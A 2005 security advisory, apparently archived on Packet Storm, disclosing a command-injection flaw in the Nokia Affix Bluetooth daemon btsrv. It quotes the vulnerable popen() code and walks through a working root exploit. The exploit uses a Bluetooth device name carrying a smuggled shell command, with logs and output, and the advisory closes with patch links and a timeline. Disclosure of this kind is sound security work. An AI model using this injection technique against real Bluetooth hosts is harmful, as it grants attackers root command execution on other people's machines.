what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DMA-2005-0826a.txt

DMA-2005-0826a.txt
Posted Aug 28, 2005
Authored by Kevin Finisterre | Site digitalmunition.com

The Nokia Affix Bluetooth btsrv makes poor use of a popen() that in turn allows for privileged code execution as root.

tags | exploit, root, code execution
SHA-256 | cc94edfe1b5429594863603c23d573003e4beca70953ed64e8954d0aeb65b705

DMA-2005-0826a.txt

Change Mirror Download
DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()'
Author: Kevin Finisterre
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net
Product: 'affix'
References:
http://www.digitalmunition.com/DMA[2005-0826a].txt

Description:
Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia Research Center in
Helsinki and released under GPL. Affix supports the core Bluetooth protocols like HCI, L2CAP 1.1,
L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of 'affix-kernel' which
provides kernel modules and 'affix' which provides control tools, libraries, and server daemons.

Although Nokia believes that Affix is an useful piece of software, please bear in mind that it is
not an official Nokia product, but a result of the research activity of Nokia Research Center.

The following code snippet was found in affix-3.2.0/daemon/btsrv.c:

int event_pin_code_request(struct PIN_Code_Request_Event *evt, int devnum)
{
...

err = HCI_RemoteNameRequest(fd, &dev, name);
if (err) {
BTDEBUG("Name request failed: %s", hci_error(err));
...
sprintf(cmdline, "/etc/affix/btsrv-gui pin \"%s\" %s", name, bda2str(&evt->bda));
DBPRT("cmdline: [%s]", cmdline);
fp = popen(cmdline, "r");
if (!fp) {
BTERROR("popen() failed");
goto err;
}
err = fscanf(fp, "%s", pin);
if (err == EOF) {
BTERROR("fscanf() failed");
pclose(fp);
goto err;
}

Exploitation of this bug is easier than the bluez variation of the same attack. When exploiting
bluez, previous population of the bluetooth name cache is required. On Affix however the call to
HCI_RemoteNameRequest() makes this an instant exploit regardless of the name cache.

The btsrv daemon should obviously be started.
root@animosity:~# btsrv
btsrv: main: btsrv started [Affix 3.2.0].
btsdpd: main: btsdpd Affix 3.2.0 started.
btsrv: start_service: Bound service Dialup Networking to port 1
btsrv: start_service: Bound service Dialup Networking Emulation to port 2
btsrv: start_service: Bound service Fax Service to port 3
btsrv: start_service: Bound service LAN Access to port 4
btsrv: start_service: Bound service OBEX File Transfer to port 5
btsrv: start_service: Bound service OBEX Object Push to port 6

As an example I will use my Ipaq 2215 to attack an Affix box. First I set the bluetooth name of
my device to ";/usr/bin/id>/tmp/ooooo;"

Next I start the attack by opening the bluetooth manager, clicking tools and going to Paired
devices. Next I click Add, search for the target host and then double tap it. When prompted for
a pin code I type in any random pin code and press enter.

After a few moments I get an "Authentication failed!" message.

On the screen where btsrv was started I see the following error which indicates an attack is
in progress.

Traceback (most recent call last):
File "/etc/affix/btsrv-gui", line 106, in ?
pin = t.go("Connection from %s [%s]" % (sys.argv[2], sys.argv[3]))
IndexError: list index out of range
sh: : command not found
btsrv: event_pin_code_request: fscanf() failed

Looking in /tmp on the target device shows successful exploitation.

root@animosity:~# ls -al /tmp/ooooo
-rw-r--r-- 1 root root 134 2005-08-26 16:47 /tmp/ooooo
root@animosity:~# cat /tmp/ooooo
uid=0(root) gid=0(root) groups=0(root)

Feel free to get creatitve with this... http://www.digitalmunition.com/BluezHCIDpwned.txt

Official patches for Affix can be found at http://affix.sourceforge.net
http://affix.sourceforge.net/patch_btsrv_affix_3_2_0
http://affix.sourceforge.net/patch_btsrv_affix_2_1_2

Timeline:
08/06/2005 bluez 2.19 stomps my Affix bug and reveals that *someone* borrowed bad code again!
08/18/2005 *sigh* I guess I should tell Nokia about the bug now.
08/22/2005 Carlos.Chinea from nokia responds that he will "look to it asap and fix it also asap".
08/26/2005 btsrv popen() call patch released

Outtakes:
"no, they copied from us.." - bluez
"As far as I know, we didn't borrow code...So I guess they did then" - affix

-KF


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close